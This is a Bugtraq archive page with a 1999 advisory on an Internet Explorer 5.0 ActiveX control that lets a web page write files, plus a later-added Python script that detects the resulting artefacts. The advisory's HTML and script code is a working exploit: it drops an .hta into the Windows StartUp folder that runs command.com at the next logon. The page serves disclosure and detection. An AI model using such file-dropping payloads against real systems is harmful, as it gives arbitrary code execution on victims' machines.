Bugtraq mailing list archives
IE 5.0 allows executing programs
From: joro () NAT BG (Georgi Guninski)
Date: Sat, 21 Aug 1999 19:17:10 +0300
Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.0 under Windows 95/98 (do not know about NT) allows executing arbitrary programs on the local machine by creating and overwriting local files and putting content in them.

Details:
The problem is the ActiveX Control "Object for constructing type libraries for scriptlets". It allows creating and overwriting local files and, what is more, putting content in them. There is some unneeded information in the file, but part of the content may be chosen. So, an HTML Application file may be created, fed with exploit information and written to the StartUp folder. The next time the user reboots (which may be forced), the code in the HTML Application file will be executed.
This vulnerability can be exploited via email.

Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html

Workaround:
Disable Active Scripting or Disable Run ActiveX Controls and plug-ins

The code is:

<!-- The "type libraries for scriptlets" control: its Path/Doc properties and write() method write Doc to the local file Path -->
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
// Target file: an .hta in the StartUp folder, so it runs at the next reboot/logon
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
// Body of the .hta: instantiates the Windows Script Host shell object (wsh) and calls Run().
// The closing SCRIPT tag is split as "</"+"SCRIPT>" so the HTML parser does not end this outer script early.
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>

Regards,
Georgi Guninski
http://www.nat.bg/~joro
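The following is an added example, not part of Georgi Guninski's post or of the demonstration page it links to. It is a small triage script for the two artefacts this advisory produces on a victim machine: an .hta dropped into the StartUp folder, and page or .hta content that references the two ActiveX controls involved. The two CLSIDs are the ones quoted in the advisory; the indicator names, regular expressions, sample file contents and function names are my own constructions. On Windows, killbit_set() additionally reads IE's standard kill-bit location (the "Compatibility Flags" value, bit 0x400, under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}), which is how a control like this one is blocked from being instantiated by the browser; elsewhere it returns None.

```python
import os
import re
import sys
import tempfile

# CLSIDs as quoted in the advisory above.
SCRIPTLET_TYPELIB_CLSID = "06290BD5-48AA-11D2-8432-006008C3FBFC"  # control that writes local files
WSCRIPT_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"     # shell object used for Run()

# Indicator names and patterns are my own (not from the advisory).
INDICATORS = {
    "scriptlet_typelib": re.compile(re.escape(SCRIPTLET_TYPELIB_CLSID), re.I),
    "wscript_shell": re.compile(re.escape(WSCRIPT_SHELL_CLSID), re.I),
    "shell_run": re.compile(r"\.Run\s*\(", re.I),
    # one or more backslashes, so both raw paths and JS-escaped "\\" source match
    "startup_path": re.compile(r"Start Menu\\+Programs\\+StartUp", re.I),
}


def scan_text(text):
    """Return the sorted names of the indicators present in a page or .hta body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_startup_folder(folder):
    """Return {filename: [indicators]} for every .hta in a StartUp folder.

    Any .hta in StartUp runs with full local privileges at logon, so each one is
    reported even when no indicator matches (an empty list means: review by hand).
    """
    findings = {}
    for name in os.listdir(folder):
        if not name.lower().endswith(".hta"):
            continue
        with open(os.path.join(folder, name), "r", errors="replace") as f:
            findings[name] = scan_text(f.read())
    return findings


def killbit_set(clsid):
    """On Windows, report whether IE's kill bit (Compatibility Flags & 0x400) is set
    for clsid. Returns None off Windows, False if the key or value is absent."""
    if sys.platform != "win32":
        return None
    import winreg
    path = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{%s}" % clsid
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            flags, _ = winreg.QueryValueEx(key, "Compatibility Flags")
    except OSError:
        return False
    return bool(flags & 0x400)


# Constructed sample: the kind of body the advisory's scr.Doc writes into the .hta.
SAMPLE_HTA = ("<object id='wsh' classid='clsid:" + WSCRIPT_SHELL_CLSID + "'></object>"
              "<SCRIPT>alert('x');wsh.Run('c:\\\\command.com');</SCRIPT>")


def demo():
    """Build a throwaway StartUp-like folder with one dropped .hta and one benign
    file, then scan it. Returns the findings dict."""
    with tempfile.TemporaryDirectory() as startup:
        with open(os.path.join(startup, "guninski.hta"), "w") as f:
            f.write(SAMPLE_HTA)
        with open(os.path.join(startup, "readme.txt"), "w") as f:
            f.write("not a script")
        return scan_startup_folder(startup)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, "->", ", ".join(hits) or "(no indicators; review manually)")
    print("kill bit on file-writing control:", killbit_set(SCRIPTLET_TYPELIB_CLSID))
```

Point scan_startup_folder() at the real per-user and common StartUp folders when hunting; scan_text() can be run over saved web pages or mail bodies to find the delivery side (the file-writing CLSID together with a StartUp path) rather than only the dropped .hta.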
Current thread:
- IE 5.0 allows executing programs Georgi Guninski (Aug 21)
- Re: IE 5.0 allows executing programs David LeBlanc (Aug 23)
- Re: IE 5.0 allows executing programs Jesper M. Johansson (Aug 28)